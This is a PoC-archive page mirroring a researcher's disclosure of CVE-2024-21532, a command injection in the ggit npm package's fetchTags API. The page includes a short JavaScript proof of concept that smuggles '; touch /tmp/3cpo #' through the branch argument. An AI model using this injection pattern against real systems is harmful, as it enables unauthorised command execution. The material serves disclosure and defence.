POC详情: 03d7272e1b31acfa53e40d8934e764b648a24b36

来源
https://github.com/lirantal/CVE-2024-21532-PoC-ggit
关联漏洞
标题: ggit 安全漏洞 (CVE-2024-21532)
描述:ggit是Gleb Bahmutov个人开发者的一个工具。 ggit存在安全漏洞,该漏洞源于允许用户输入要获取的分支,容易受到命令注入攻击。
描述
CVE-2024-21532 PoC ggit
介绍
# CVE-2024-21532 Command Injection vulnerability in ggit

`ggit` describes itself as:

```
Local promise-returning git command wrappers
```

Resources: 
 * Project's GitHub source code: https://github.com/bahmutov/ggit
 * Project's npm package: https://www.npmjs.com/package/ggit

Article write-up on this vulnerability: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

## Background on exploitation

I'm reporting a Command Injection vulnerability in `ggit` npm package.

This vulnerability manifests with the library's `fetchTags(branch)` API,
which allows user input to specify the branch to be fetched and then concatenates
this string along with a git command which is then passed to the unsafe `exec()`
Node.js child process API.

## Exploit

1. Install `ggit@2.4.12` or earlier
2. Establish the following POC:

```js
const fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
  // should be same as running command
  // git pull origin --tags
  console.log("done");
});
```

3. Observe new file created on disk at `/tmp/3cpo`

# Author

Liran Tal
文件快照

 [4.0K]  /data/pocs/03d7272e1b31acfa53e40d8934e764b648a24b36
└── [1.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。